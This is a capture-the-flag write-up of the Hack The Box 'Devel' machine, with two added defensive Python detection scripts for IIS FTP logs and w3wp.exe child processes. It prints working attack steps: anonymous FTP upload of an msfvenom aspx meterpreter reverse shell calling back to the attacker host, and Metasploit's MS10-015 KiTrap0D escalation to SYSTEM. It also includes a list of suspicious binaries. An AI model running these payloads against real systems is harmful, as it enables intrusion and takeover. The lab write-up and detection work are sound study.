j4ckdaw@site:~$

HTB Writeup - DEVEL

Devel was another pretty easy box, involving a misconfigured FTP server and a famous Windows kernel exploit. Let’s get started with an nmap scan:

root@kali:~# nmap -sV 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.053s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

If we try the IP in a browser, we’ll get a boilerplate IIS landing page. It’s not much help, so we’ll move on to the FTP server. It allows anonymous access:

root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

But there’s more… it seems the FTP service also allows us to upload files anonymously!

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
09-07-19  06:41PM                    0 test.txt
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

Foothold

Given that the ftproot seems to also be the webroot, we can upload a file here and then access it using a browser. The ‘aspnet_client’ folder indicates the IIS server will handle .asp or .aspx files, so we’ll use msfvenom to generate one, then ftp to the host again to upload.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f aspx -o gimme_shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2800 bytes
Saved as: gimme_shell.aspx
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put gimme_shell.aspx
local: gimme_shell.aspx remote: gimme_shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2836 bytes sent in 0.00 secs (17.2269 MB/s)
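From the defender's side, the two things that make this foothold possible, anonymous FTP logins and accepted writes landing in a directory IIS also serves, both leave a trail in the FTP server's W3C logs. The Python script below is an added example and not part of the original writeup: it parses IIS FTP log lines (the sample log is constructed to mirror the session above; the column layout is read from the '#Fields:' header, so a different field order also works) and flags anonymous logins and successful writes, rating any write of an IIS-executable extension such as .aspx as critical regardless of who performed it. Field names, session ids and timestamps in the sample are assumptions, not output from this box.

```python
"""Flag anonymous FTP logins and uploads of server-executable files in
IIS FTP W3C logs.  Added example for this writeup: the log below is
constructed to mirror the session in the post and is not a real log."""
from dataclasses import dataclass
from pathlib import PurePosixPath
from typing import Dict, Iterable, List

# Constructed sample in the W3C extended layout IIS FTP writes; the
# '#Fields:' header is parsed, so a different column order still works.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2019-09-07 18:41:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-09-07 18:41:02 10.10.14.19 - 10.10.10.5 21 USER anonymous 331 0 0 s1 -
2019-09-07 18:41:03 10.10.14.19 anonymous 10.10.10.5 21 PASS *** 230 0 0 s1 -
2019-09-07 18:41:05 10.10.14.19 anonymous 10.10.10.5 21 NLST - 226 0 0 s1 /
2019-09-07 18:41:20 10.10.14.19 anonymous 10.10.10.5 21 STOR test.txt 226 0 0 s1 /test.txt
2019-09-07 18:45:10 10.10.14.19 anonymous 10.10.10.5 21 STOR gimme_shell.aspx 226 0 0 s1 /gimme_shell.aspx
2019-09-07 19:00:00 10.10.14.50 deploy 10.10.10.5 21 STOR release.zip 226 0 0 s2 /release.zip
2019-09-07 19:05:00 10.10.14.50 deploy 10.10.10.5 21 STOR test.aspx 550 0 0 s2 /test.aspx
"""

# Extensions IIS hands to a script engine; a write of one of these into a
# directory the web server also serves is a web shell until proven otherwise.
WEB_EXEC_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".ascx", ".svc", ".config"}
# FTP commands that create or rename content on the server.
WRITE_METHODS = {"STOR", "STOU", "APPE", "RNTO"}


@dataclass
class Finding:
    severity: str
    reason: str
    time: str
    client: str
    user: str
    path: str


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C log lines into dicts keyed by the names in '#Fields:'."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue  # malformed line: skip rather than abort the whole run
        records.append(dict(zip(fields, values)))
    return records


def analyze(log_text: str) -> List[Finding]:
    """Return findings for anonymous logins and accepted writes."""
    findings: List[Finding] = []
    for r in parse_w3c(log_text.splitlines()):
        method = r.get("cs-method", "").upper()
        user = r.get("cs-username", "-")
        status = r.get("sc-status", "")
        when = f"{r.get('date', '')} {r.get('time', '')}"
        client = r.get("c-ip", "-")
        anonymous = user.lower() == "anonymous"

        if method == "PASS" and status == "230" and anonymous:
            findings.append(Finding("high", "anonymous login accepted", when, client, user, "-"))
            continue

        # Only writes the server actually accepted (2xx reply) matter here.
        if method in WRITE_METHODS and status.startswith("2"):
            path = r.get("x-fullpath", "-")
            if path == "-":
                path = r.get("cs-uri-stem", "-")
            ext = PurePosixPath(path).suffix.lower()
            if ext in WEB_EXEC_EXTENSIONS:
                sev, why = "critical", f"server-executable file written via FTP ({ext})"
            elif anonymous:
                sev, why = "high", "anonymous write to FTP root"
            else:
                sev, why = "info", "authenticated write"
            findings.append(Finding(sev, why, when, client, user, path))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.severity:8}] {f.time} {f.client} {f.user:10} {f.path:20} {f.reason}")
```

The rejected `STOR test.aspx` (reply 550) is deliberately left out of the findings: the point of the check is accepted writes, and a noisy rule is one that gets ignored. Correlating a critical finding here with an IIS access-log request for the same file name is the quickest way to confirm the upload was executed.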

Now we need to set up a listener to receive the reverse shell connection. Let’s use msfconsole.

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.19
LHOST => 10.10.14.19
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.19:6666

Once we browse to gimme_shell.aspx on the remote host, IIS executes the page and we get a meterpreter session:

[*] Started reverse TCP handler on 10.10.14.19:6666 
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.19:6666 -> 10.10.10.5:49160)
[*] Sending stage (180291 bytes) to 10.10.10.5
meterpreter >

Privilege Escalation

Who are we, and what do we know about the system?

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

We’re on a 32-bit (x86) Windows 7 system at build 7600, so there’s a decent chance of getting SYSTEM privileges immediately with KiTrap0D (MS10-015):

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d 
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.19
LHOST => 10.10.14.19
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 7777
LPORT => 7777
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.19:7777 
[*] Launching notepad to host the exploit...
[+] Process 1588 launched.
[*] Reflectively injecting the exploit DLL into 1588...
[*] Injecting exploit into 1588 ...
[*] Exploit injected. Injecting payload into 1588...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.19:7777 -> 10.10.10.5:49163) 

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

And we’re root :)

meterpreter > cat /users/babis/desktop/user.txt.txt
meterpreter > cat /users/administrator/desktop/root.txt.txt
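The escalation above is loud from a process-tree point of view: the session runs as the application pool identity `IIS APPPOOL\Web`, and the module's "Launching notepad to host the exploit" step means the web worker process spawns notepad.exe, which no legitimate ASP.NET application does. The Python script below is an added example, not part of the original writeup: it runs a simple rule over process-creation records shaped like Sysmon Event ID 1 (the events are constructed to resemble this box and are not real telemetry) and flags children of the IIS worker process, or any process running under an `IIS APPPOOL\` account, that are not part of normal ASP.NET page compilation. It assumes the ASP.NET payload executed inside w3wp.exe, so the notepad process appears as its child; the allowlist, process ids and paths are assumptions.

```python
"""Flag unexpected child processes of the IIS worker process.  Added
example for this writeup; the events below are constructed to resemble
Sysmon process-creation (Event ID 1) records and are not real telemetry.
Assumption: the ASP.NET payload ran inside w3wp.exe, so the notepad.exe
launched to host the kernel exploit shows up as a child of w3wp.exe."""
import ntpath
from typing import Dict, List, Optional

# Children w3wp.exe legitimately spawns: ASP.NET compiles pages on first
# request through the C#/VB compilers and the resource converter.
EXPECTED_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe"}
# Binaries that should never hang off a web worker; one of these running
# under an app-pool identity is a strong code-execution signal.
LOLBINS = {"cmd.exe", "powershell.exe", "notepad.exe", "rundll32.exe",
           "regsvr32.exe", "mshta.exe", "certutil.exe", "wscript.exe", "cscript.exe"}

# Constructed events (not real telemetry) mirroring the session in the post.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"UtcTime": "2019-09-07 18:46:01", "ProcessId": 2044, "User": r"IIS APPPOOL\Web",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"UtcTime": "2019-09-07 18:50:12", "ProcessId": 1588, "User": r"IIS APPPOOL\Web",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"UtcTime": "2019-09-07 18:52:40", "ProcessId": 3020, "User": r"DEVEL\babis",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"UtcTime": "2019-09-07 18:53:05", "ProcessId": 3104, "User": r"IIS APPPOOL\Web",
     "Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
]


def classify(event: Dict[str, object]) -> Optional[str]:
    """Return a severity for a suspicious event, or None if it looks benign."""
    # ntpath handles backslash paths correctly even when run on Linux.
    image = ntpath.basename(str(event["Image"])).lower()
    parent = ntpath.basename(str(event["ParentImage"])).lower()
    user = str(event.get("User", ""))
    from_worker = parent == "w3wp.exe"
    as_apppool = user.upper().startswith("IIS APPPOOL\\")
    if not (from_worker or as_apppool):
        return None
    # The worker itself, and the compilers it runs, are expected.
    if image == "w3wp.exe" or image in EXPECTED_CHILDREN:
        return None
    return "high" if image in LOLBINS else "medium"


def detect(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run classify() over a batch of events and return the alerts."""
    alerts: List[Dict[str, object]] = []
    for e in events:
        sev = classify(e)
        if sev is None:
            continue
        alerts.append({
            "severity": sev,
            "UtcTime": e["UtcTime"],
            "ProcessId": e["ProcessId"],
            "User": e.get("User", ""),
            "Image": ntpath.basename(str(e["Image"])),
            "ParentImage": ntpath.basename(str(e["ParentImage"])),
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']:6}] {a['UtcTime']} pid={a['ProcessId']} "
              f"{a['ParentImage']} -> {a['Image']} as {a['User']}")
```

The same rule catches the FTP-upload web shell even without a kernel exploit, because any command it runs is a child of w3wp.exe. Patching MS10-015 removes this particular escalation, but the app-pool identity spawning anything at all is the finding worth alerting on.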

Thanks for reading!

  • j4ckdaw